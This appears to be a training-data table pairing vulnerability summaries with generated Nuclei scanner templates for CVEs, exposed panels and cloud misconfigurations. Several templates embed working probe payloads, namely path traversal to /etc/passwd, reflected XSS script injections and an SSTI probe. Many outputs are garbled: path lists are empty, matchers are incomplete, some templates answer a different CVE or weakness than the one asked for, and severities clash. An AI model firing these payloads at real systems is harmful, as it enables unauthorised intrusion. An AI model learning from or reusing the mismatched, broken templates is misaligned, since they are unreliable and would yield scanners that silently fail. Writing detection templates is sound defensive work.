instruction
stringlengths
41
188
input
stringlengths
165
3.12k
output
stringlengths
256
2.26M
category
stringclasses
3 values
severity
stringclasses
5 values
id
stringlengths
5
54
Generate a Nuclei template for CVE-2024-4956
Title: Path Traversal in CVE-2024-4956 Summary: Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1. Vulnerability Type: Path Traversal Severity: high Indicators: error, vulnerability detected
id: CVE-2024-4956 info: name: Sonatype Nexus Repository Manager 3 - Local File Inclusion author: ritikchaddha severity: high description: Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1. tags: cve,cve2024,nexus,lfi,sonatype,vuln http: - method: GET path: - "{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" matchers: - type: dsl condition: and
cve
high
CVE-2024-4956
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: intelbras-login info: name: Intelbras Router Login Panel - Detect author: DhiyaneshDK severity: info description: Intelbras router logjn panel was detected. tags: panel,edb,discovery http: - method: GET path: - "{{BaseURL}}/login.html" matchers: - type: word words: - "<title>Intelbras</title>" - type: status status: - 200
cwe
medium
CWE-200
Generate a Nuclei template for: Credential Guard Not Enabled
Title: Credential Guard Not Enabled Summary: Credential Guard Not Enabled. Verifies if Windows Defender Credential Guard is disabled, reducing protection against credential theft. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: credential-guard-disabled info: name: Credential Guard Not Enabled author: princechaddha severity: high description: Verifies if Windows Defender Credential Guard is disabled, reducing protection against credential theft. tags: credential-guard,code,windows-audit http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
high
credential-guard-disabled
Generate a Nuclei template for CVE-2021-41467
Title: Cross-Site Scripting (XSS) in justwriting_project justwriting Summary: Cross-site scripting (XSS) vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter. Vulnerability Type: Cross-Site Scripting (XSS) Severity: medium Affected Products: justwriting_project justwriting Indicators: error, vulnerability detected
id: CVE-2021-41467 info: name: JustWriting - Cross-Site Scripting author: madrobot severity: medium description: A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter. tags: cve2021,cve,justwriting,xss,justwriting_project,vuln http: - method: GET path: matchers: - type: dsl condition: and - method: GET path: matchers: - type: dsl condition: and
cve
medium
CVE-2021-41467
Generate a Nuclei template for: Unrestricted Oracle Database Access in Azure NSGs
Title: Unrestricted Oracle Database Access in Azure NSGs Summary: Unrestricted Oracle Database Access in Azure NSGs. Ensure that Microsoft Azure network security groups (NSGs) do not allow unrestricted inbound access on TCP port 1521, used for Oracle Database, to protect against unauthorized database access. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: azure-nsg-oracle-db-unrestricted info: name: Unrestricted Oracle Database Access in Azure NSGs author: princechaddha severity: high description: Ensure that Microsoft Azure network security groups (NSGs) do not allow unrestricted inbound access on TCP port 1521, used for Oracle Database, to protect against unauthorized database access. tags: cloud,devops,azure,microsoft,nsg,azure-cloud-config http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
high
azure-nsg-oracle-db-unrestricted
Generate a Nuclei template for CVE-2018-19877
Title: Cross-Site Scripting (XSS) in adiscon loganalyzer Summary: login.php in Adiscon LogAnalyzer before 4.1.7 has XSS via the Login Button Referer field. Vulnerability Type: Cross-Site Scripting (XSS) Severity: medium Affected Products: adiscon loganalyzer Indicators: error, vulnerability detected
id: CVE-2018-19877 info: name: Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting author: arafatansari severity: medium description: Adiscon LogAnalyzer before 4.1.7 contains a cross-site scripting vulnerability in the 'referer' parameter of the login.php file. tags: cve,cve2018,adiscon,xss,edb,vuln http: - method: GET path: - "{{BaseURL}}/src/login.php?referer=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E" matchers: - type: word words: - "value=""><script>confirm(document.domain)</script>" part: body - type: word words: - "text/html" part: header - type: status status: - 200
cve
medium
CVE-2018-19877
Generate a Nuclei template for: slsh - Privilege Escalation
Title: slsh - Privilege Escalation Summary: slsh - Privilege Escalation. slsh is a command-line shell that is designed to provide a secure environment for executing shell commands. It is often used in scenarios where security and privilege separation are important, such as in web hosting environments or when running untrusted code. slsh aims to provide a secure and restricted shell environment for executing commands. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: privesc-slsh info: name: slsh - Privilege Escalation author: daffainfo severity: high description: slsh is a command-line shell that is designed to provide a secure environment for executing shell commands. It is often used in scenarios where security and privilege separation are important, such as in web hosting environments or when running untrusted code. slsh aims to provide a secure and restricted shell environment for executing commands. tags: code,linux,slsh,privesc,local http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
high
privesc-slsh
Generate a Nuclei template for: BlackMoon FTP Free Edition Service - Detect
Title: BlackMoon FTP Free Edition Service - Detect Summary: BlackMoon FTP Free Edition Service - Detect. BlackMoon FTP Free Edition service was detected. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: blackmoon-free-ftp-detect info: name: BlackMoon FTP Free Edition Service - Detect author: pussycat0x severity: info description: BlackMoon FTP Free Edition service was detected. tags: network,ftp,blackmoon,detect,tcp,discovery http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
info
blackmoon-free-ftp-detect
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: configure-dns-server info: name: DNS Server Not Implemented - Detect author: pussycat0x severity: info description: DNS is recommended to be configured over TLS. This prevents intermediate parties and potential attackers from viewing the content of DNS queries and can also assure that DNS is being provided by the expected DNS servers. tags: firewall,config,audit,pfsense,file http: - method: GET path: - "/" matchers: - type: status status: - 200
cwe
medium
CWE-200
Generate a Nuclei template for CVE-2023-40755
Title: Cross-Site Scripting (XSS) in phpjabbers callback_widget Summary: There is a Cross Site Scripting (XSS) vulnerability in the "theme" parameter of preview.php in PHPJabbers Callback Widget v1.0. Vulnerability Type: Cross-Site Scripting (XSS) Severity: medium Affected Products: phpjabbers callback_widget Indicators: error, vulnerability detected
id: CVE-2023-40755 info: name: PHPJabbers Callback Widget v1.0 - Cross-Site Scripting author: ritikchaddha severity: medium description: There is a Cross Site Scripting (XSS) vulnerability in the "theme" parameter of preview.php in PHPJabbers Callback Widget v1.0. tags: cve,cve2023,phpjabbers,callback-widget,xss,vuln http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "PHPJabbers" part: body - method: GET path: - "{{BaseURL}}/preview.php?theme=theme10dnel8%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Eko0so" matchers: - type: word words: - "theme=theme10dnel8"><script>alert(document.domain)</script>ko0" part: body - type: word words: - "text/html" part: content_type - type: status status: - 200
cve
medium
CVE-2023-40755
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: submitty-login info: name: Submitty Login Panel - Detect author: princechaddha severity: info description: Submitty login panel was detected. tags: panel,submitty,oss,discovery http: - method: GET path: - "{{BaseURL}}/authentication/login" matchers: - type: word words: - "submitty-banner" - "https://submitty.org" part: body condition: and - type: status status: - 200
cwe
medium
CWE-200
Generate a Nuclei template for: WordPress DB Backup
Title: WordPress DB Backup Summary: WordPress DB Backup. WordPress DB Backup plugin exposes db file along with directory listing. Vulnerability Type: Security Check Severity: medium Indicators: vulnerability detected
id: wordpress-db-backup-listing info: name: WordPress DB Backup author: Suman_Kar severity: medium description: WordPress DB Backup plugin exposes db file along with directory listing. tags: wordpress,backup,vuln http: - method: GET path: - "{{BaseURL}}/wp-content/uploads/database-backups/" matchers: - type: word words: - "Index of /" - "wp-content/uploads/database-backups" - ".sql" part: body condition: and - type: status status: - 200
generic
medium
wordpress-db-backup-listing
Generate a Nuclei template for: CloudFormation Termination Protection - Disabled
Title: CloudFormation Termination Protection - Disabled Summary: CloudFormation Termination Protection - Disabled. Ensure that Termination Protection safety feature is enabled for your Amazon CloudFormation stacks in order to protect them from being accidentally deleted. Vulnerability Type: Security Check Severity: medium Indicators: vulnerability detected
id: stack-termination-disabled info: name: CloudFormation Termination Protection - Disabled author: DhiyaneshDK severity: medium description: Ensure that Termination Protection safety feature is enabled for your Amazon CloudFormation stacks in order to protect them from being accidentally deleted. tags: cloud,devops,aws,amazon,cloudformation,aws-cloud-config http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
medium
stack-termination-disabled
Generate a Nuclei template for: PRTG Security Checks
Title: PRTG Security Checks Summary: PRTG Security Checks. A simple workflow that runs all PRTG related nuclei templates on a given target. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: prtg-workflow info: name: PRTG Security Checks author: daffainfo severity: info description: A simple workflow that runs all PRTG related nuclei templates on a given target. tags: unknown http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
info
prtg-workflow
Generate a Nuclei template for: Safe SVG Detection
Title: Safe SVG Detection Summary: Safe SVG Detection. Tags: tech, wordpress, wp-plugin Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: wordpress-safe-svg info: name: Safe SVG Detection author: ricardomaia severity: info description: Safe SVG Detection tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/safe-svg/readme.txt" matchers: - type: dsl - type: regex part: body
generic
info
wordpress-safe-svg
Generate a Nuclei template to detect Cross-site Scripting
Title: Cross-site Scripting (CWE-79) Summary: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. There are many variants of cross-site scripting, characterized by a variety of terms or involving different attack topologies. However, they all indicate the same fundamental weakness: improper neutralization of dangerous input between the adversary and a victim. Vulnerability Type: Cross-site Scripting Severity: high Indicators: vulnerability detected, error
id: wp-custom-tables-xss info: name: WordPress Custom Tables 3.4.4 - Cross-Site Scripting author: daffainfo severity: high description: WordPress Custom Tables 3.4.4 plugin contains a cross-site scripting vulnerability via the key parameter. tags: wpscan,wordpress,xss,wp-plugin,vuln http: - method: GET path: matchers: - type: word words: - "custom tables" - "Tags:" condition: and - method: GET path: - "{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers: - type: word words: - "</script><script>alert(document.domain)</script>" part: body - type: word words: - "text/html" part: header - type: status status: - 200
cwe
high
CWE-79
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: freepbx-administration-panel info: name: FreePBX Admin Panel - Detect author: tess,darses severity: info description: FreePBX admin panel was detected. tags: freepbx,panel,sangoma,discovery http: - method: GET path: - "{{BaseURL}}/admin/config.php" matchers: - type: word words: - "<title>FreePBX" - "FreePBX</title>" part: body condition: or - type: word words: - "text/html" part: header - type: status status: - 200
cwe
medium
CWE-200
Generate a Nuclei template for CVE-2018-15138
Title: Path Traversal in ericssonlg ipecs_nms Summary: Ericsson-LG iPECS NMS 30M allows directory traversal via ipecs-cm/download?filename=../ URIs. Vulnerability Type: Path Traversal Severity: high Affected Products: ericssonlg ipecs_nms Indicators: error, vulnerability detected
id: CVE-2018-15138 info: name: LG-Ericsson iPECS NMS 30M - Local File Inclusion author: 0x_Akoko severity: high description: Ericsson-LG iPECS NMS 30M allows local file inclusion via ipecs-cm/download?filename=../ URIs. tags: cve2018,cve,ericsson,lfi,traversal,edb,ericssonlg,vkev,vuln http: - method: GET path: - "{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data" - "{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg" matchers: - type: regex - type: status status: - 200
cve
high
CVE-2018-15138
Generate a Nuclei template to detect Insufficiently Protected Credentials
Title: Insufficiently Protected Credentials (CWE-522) Summary: The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval. Vulnerability Type: Insufficiently Protected Credentials Severity: medium Indicators: unauthorized
id: ibm-hmc-default-login info: name: IBM Power HMC - Default Login author: R3S OST severity: high description: IBM HMC default admin login credentials were discovered. tags: default-login,ibm,hmc,vuln http: - method: GET path: matchers: - type: dsl condition: and
cwe
medium
CWE-522
Generate a Nuclei template for: Area Rat C2 - Detect
Title: Area Rat C2 - Detect Summary: Area Rat C2 - Detect. Ares is a Python Remote Access Tool. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: ares-rat-c2 info: name: Area Rat C2 - Detect author: pussycat0x severity: info description: Ares is a Python Remote Access Tool. tags: c2,ir,osint,ares,panel,rat,vuln http: - method: GET path: - "{{BaseURL}}/login" matchers: - type: word words: - "<title>Ares</title>" - "Passphrase:" part: body condition: and - type: status status: - 200
generic
info
ares-rat-c2
Generate a Nuclei template for CVE-2023-35078
Title: Authentication Bypass in ivanti endpoint_manager_mobile Summary: An authentication bypass vulnerability in Ivanti EPMM allows unauthorized users to access restricted functionality or resources of the application without proper authentication. Vulnerability Type: Authentication Bypass Severity: critical Affected Products: ivanti endpoint_manager_mobile Indicators: unauthorized
id: CVE-2023-35078 info: name: Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass author: parth,pdresearch severity: critical description: Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild in July 2023. A patch is available. tags: cve,cve2023,kev,ivanti,mobileiron,epmm,vkev,vuln http: - method: GET path: - "{{BaseURL}}/mifs/aad/api/v2/admins/users" matchers: - type: dsl condition: and
cve
critical
CVE-2023-35078
Generate a Nuclei template for CVE-2023-0448
Title: Cross-Site Scripting (XSS) in matbao wp_helper_premium Summary: The WP Helper Lite WordPress plugin, in versions < 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability. Vulnerability Type: Cross-Site Scripting (XSS) Severity: medium Affected Products: matbao wp_helper_premium Indicators: error, vulnerability detected
id: CVE-2023-0448 info: name: WP Helper Lite < 4.3 - Cross-Site Scripting author: ritikchaddha severity: medium description: The WP Helper Lite WordPress plugin, in versions < 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability. tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,wp-helper-lite,matbao,vuln http: - method: GET path: - "{{BaseURL}}/wp-admin/admin-ajax.php?action=surveySubmit&a=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E" matchers: - type: dsl condition: and
cve
medium
CVE-2023-0448
Generate a Nuclei template for CVE-2022-1713
Title: Vulnerability (CWE-918) in diagrams drawio Summary: SSRF on /proxy in GitHub repository jgraph/drawio prior to 18.0.4. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information. Vulnerability Type: Vulnerability (CWE-918) Severity: high Affected Products: diagrams drawio Indicators: error, vulnerability detected
id: CVE-2022-1713 info: name: Drawio <18.0.4 - Server-Side Request Forgery author: pikpikcu severity: high description: Drawio prior to 18.0.4 is vulnerable to server-side request forgery. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information. tags: cve,cve2022,drawio,ssrf,oss,huntr,diagrams,vuln http: - method: GET path: matchers: - type: word words: - "<title>Flowchart Maker & Online Diagram Software</title>" part: body - type: word words: - "application/octet-stream" part: header
cve
high
CVE-2022-1713
Generate a Nuclei template for CVE-2019-0195
Title: Deserialization of Untrusted Data in apache tapestry Summary: Manipulating classpath asset file URLs, an attacker could guess the path to a known file in the classpath and have it downloaded. If the attacker found the file with the value of the tapestry.hmac-passphrase configuration symbol, most probably the webapp's AppModule class, the value of this symbol could be used to craft a Java deserialization attack, thus running malicious injected Java code. The vector would be the t:formdata parameter from the Form component. Vulnerability Type: Deserialization of Untrusted Data Severity: critical Affected Products: apache tapestry Indicators: error, vulnerability detected
id: CVE-2021-27850 info: name: Apache Tapestry - Remote Code Execution author: pdteam severity: critical description: Apache Tapestry contains a critical unauthenticated remote code execution vulnerability. Affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. Note that this vulnerability is a bypass of the fix for CVE-2019-0195. Before that fix it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL. tags: cve,cve2021,apache,tapestry,vkev,vuln http: - method: GET path: matchers: - type: word words: - "application/java" part: header - type: word words: - "configuration" - "webtools" part: body condition: and - type: status status: - 200
cve
critical
CVE-2019-0195
Generate a Nuclei template for: UVDesk Helpdesk Installation Page - Exposure
Title: UVDesk Helpdesk Installation Page - Exposure Summary: UVDesk Helpdesk Installation Page - Exposure. Detects exposed UVDesk Helpdesk Installation page. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: uvdesk-helpdesk-installer info: name: UVDesk Helpdesk Installation Page - Exposure author: DhiyaneshDK severity: high description: Detects exposed UVDesk Helpdesk Installation page. tags: misconfig,install,exposure,uvdesk,helpdesk,vuln http: - method: GET path: - "{{BaseURL}}/#welcome" matchers: - type: word words: - "UVDesk Helpdesk Community Edition - Installation Wizard" part: body - type: status status: - 200
generic
high
uvdesk-helpdesk-installer
Generate a Nuclei template for CVE-2022-0415
Title: Vulnerability (CWE-20) in gogs gogs Summary: Remote Command Execution in uploading repository file in GitHub repository gogs/gogs prior to 0.12.6. Vulnerability Type: Vulnerability (CWE-20) Severity: high Affected Products: gogs gogs Indicators: error, vulnerability detected
id: CVE-2022-0415 info: name: Gogs <0.12.6 - Remote Command Execution author: theamanrawat severity: high description: Gogs before 0.12.6 is susceptible to remote command execution via the uploading repository file in GitHub repository gogs/gogs. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. tags: cve,cve2022,rce,gogs,authenticated,huntr,intrusive,vuln http: - method: GET path: matchers: - type: word words: - "dns" - "http" part: interactsh_protocol - type: word words: - "content="Gogs" part: body_1
cve
high
CVE-2022-0415
Generate a Nuclei template for: Monitorr Panel - Detect
Title: Monitorr Panel - Detect Summary: Monitorr Panel - Detect. Tags: panel, monitorr, detect Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: monitorr-panel info: name: Monitorr Panel - Detect author: ritikchaddha severity: info description: Monitorr Panel - Detect tags: panel,monitorr,detect,discovery http: - method: GET path: - "{{BaseURL}}" matchers: - type: dsl condition: and
generic
info
monitorr-panel
Generate a Nuclei template for: Wordnik API Test
Title: Wordnik API Test Summary: Wordnik API Test. Dictionary Data. Tags: token-spray, wordnik Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: api-wordnik info: name: Wordnik API Test author: daffainfo severity: info description: Dictionary Data tags: token-spray,wordnik http: - method: GET path: - "https://api.wordnik.com/v4/word.json/hedgehog/topExample?useCanonical=false&api_key={{token}}" matchers: - type: word words: - ""provider"" - ""year"" - ""rating"" part: body condition: and
generic
info
api-wordnik
Generate a Nuclei template for: Exposed Prometheus
Title: Exposed Prometheus Summary: Exposed Prometheus. Prometheus instance is exposed. Vulnerability Type: Security Check Severity: low Indicators: vulnerability detected
id: prometheus-log info: name: Exposed Prometheus author: dhiyaneshDK,thevillagehacker severity: low description: Prometheus instance is exposed. tags: prometheus,misconfig,vuln http: - method: GET path: - "{{BaseURL}}/prometheus" - "{{BaseURL}}/actuator/prometheus" - "{{BaseURL}}/actuator/prometheus;%2f..%2f..%2f" matchers: - type: word words: - "gateway_request_total" - "logback_events_total" condition: or - type: status status: - 200
generic
low
prometheus-log
Generate a Nuclei template for CVE-2023-30868
Title: Cross-Site Scripting (XSS) in cms_tree_page_view_project cms_tree_page_view Summary: Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Jon Christopher CMS Tree Page View plugin <= 1.6.7 versions. Vulnerability Type: Cross-Site Scripting (XSS) Severity: high Affected Products: cms_tree_page_view_project cms_tree_page_view Indicators: error, vulnerability detected
id: CVE-2023-30868 info: name: Tree Page View Plugin < 1.6.7 - Cross-Site Scripting author: r3Y3r53 severity: medium description: The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed. tags: cve2023,cve,wpscan,packetstorm,xss,wp,wordpress,authenticated,exploitdb,cms_tree_page_view_project,vuln http: - method: GET path: matchers: - type: dsl condition: and
cve
high
CVE-2023-30868
Generate a Nuclei template for: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure
Title: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure Summary: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure. The DSL-124 Wireless N300 ADSL2+ router exposes a backup configuration file that can be downloaded without authentication. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: dlink-n300-backup info: name: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure author: DhiyaneshDk severity: high description: The DSL-124 Wireless N300 ADSL2+ router exposes a backup configuration file that can be downloaded without authentication. tags: dsl,d-link,disclosure,backup,vuln http: - method: GET path: matchers: - type: dsl condition: and
generic
high
dlink-n300-backup
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: icewarp-panel-detect info: name: IceWarp Login Panel - Detect author: ritikchaddha severity: info description: IceWarp login panel was detected. tags: icewarp,panel,discovery http: - method: GET path: - "{{BaseURL}}/webmail/" matchers: - type: word words: - "IceWarp" part: header - type: status status: - 200
cwe
medium
CWE-200
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: hp-blade-system info: name: HP BladeSystem Onboard Administrator Panel - Detector author: pussycat0x severity: info description: HPBladeSystem Onboard Administrator panel was detected. tags: panel,hp,tech,discovery http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "<title>HP BladeSystem Onboard Administrator</title>" - type: status status: - 200
cwe
medium
CWE-200
Generate a Nuclei template for: Mythic C2 - Detect
Title: Mythic C2 - Detect Summary: Mythic C2 - Detect. A cross-platform, post-exploit, red teaming framework built with python3, docker, docker-compose, and a web browser UI. It's designed to provide a collaborative and user friendly interface for operators, managers, and reporting throughout red teaming. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: mythic-c2 info: name: Mythic C2 - Detect author: pussycat0x severity: info description: A cross-platform, post-exploit, red teaming framework built with python3, docker, docker-compose, and a web browser UI. It's designed to provide a collaborative and user friendly interface for operators, managers, and reporting throughout red teaming. tags: c2,ir,osint,mythic,panel,vuln http: - method: GET path: - "{{BaseURL}}/new/login" matchers: - type: word words: - "<title>Mythic</title><" part: body - type: status status: - 200
generic
info
mythic-c2
Generate a Nuclei template for: WordPress ThemeMarkers DB Migration File
Title: WordPress ThemeMarkers DB Migration File Summary: WordPress ThemeMarkers DB Migration File. Tags: wordpress, wp-plugin, backup Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: wordpress-tmm-db-migrate info: name: WordPress ThemeMarkers DB Migration File author: dwisiswant0 severity: info description: WordPress ThemeMarkers DB Migration File tags: wordpress,wp-plugin,backup,vuln http: - method: GET path: - "{{BaseURL}}/wp-content/uploads/tmm_db_migrate/tmm_db_migrate.zip" matchers: - type: word words: - "application/zip" part: header - type: regex part: body - type: status status: - 200 - type: word
generic
info
wordpress-tmm-db-migrate
Generate a Nuclei template for: Selenium - Node Exposure
Title: Selenium - Node Exposure Summary: Selenium - Node Exposure. Selenium was shown to have an exposed node. If a Selenium node is exposed without any form of authentication, remote command execution could be possible if chromium is configured. By default the port is 4444, still, most of the internet facing are done through reverse proxies. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: selenium-exposure info: name: Selenium - Node Exposure author: w0Tx severity: high description: Selenium was shown to have an exposed node. If a Selenium node is exposed without any form of authentication, remote command execution could be possible if chromium is configured. By default the port is 4444, still, most of the internet facing are done through reverse proxies. tags: misconfig,selenium,misconfiguration,rce,chromium,vuln http: - method: GET path: - "{{BaseURL}}/wd/hub" matchers: - type: word words: - "WebDriverRequest" - "<title>WebDriver Hub</title>" condition: or - type: status status: - 200
generic
high
selenium-exposure
Generate a Nuclei template for CVE-2021-44228
Title: Vulnerability (CWE-20) in siemens 6bk1602-0aa12-0tp0_firmware and others Summary: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. Vulnerability Type: Vulnerability (CWE-20) Severity: critical Affected Products: siemens 6bk1602-0aa12-0tp0_firmware, siemens 6bk1602-0aa22-0tp0_firmware, siemens 6bk1602-0aa32-0tp0_firmware Indicators: error, vulnerability detected
id: cisco-unified-communications-log4j-rce info: name: Cisco Unified Communications - Remote Code Execution (Apache Log4j) author: DhiyaneshDK severity: critical description: Cisco Unified Communications is susceptible to remote code execution via the Apache Log4j framework. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. tags: cve,cve2021,rce,jndi,log4j,cisco,kev,oast,vuln http: - method: GET path: matchers: - type: word words: - "dns" part: interactsh_protocol - type: regex part: interactsh_request
cve
critical
CVE-2021-44228
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: sonicwall-analyzer-login info: name: SonicWall Analyzer Login Panel - Detect author: DhiyaneshDK severity: info description: SonicWall Analyzer login panel was detected. tags: panel,sonicwall,discovery http: - method: GET path: - "{{BaseURL}}/sgms/auth" matchers: - type: word words: - "SonicWall Analyzer Login" part: body - type: status status: - 200
cwe
medium
CWE-200
Generate a Nuclei template for: Twig PHP <2.4.4 template engine - SSTI
Title: Twig PHP <2.4.4 template engine - SSTI Summary: Twig PHP <2.4.4 template engine - SSTI. A vulnerability in Twig PHP allows remote attackers to cause the product to execute arbitrary commands via an SSTI vulnerability. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: twig-php-ssti info: name: Twig PHP <2.4.4 template engine - SSTI author: madrobot severity: high description: A vulnerability in Twig PHP allows remote attackers to cause the product to execute arbitrary commands via an SSTI vulnerability. tags: php,ssti,twig,vuln http: - method: GET path: - "{{BaseURL}}/search?search_key=%7B%7B1337*1338%7D%7D" matchers: - type: word words: - "1788906" part: body - type: status status: - 404
generic
high
twig-php-ssti
Generate a Nuclei template for: Untangle Exposed Admin Signup
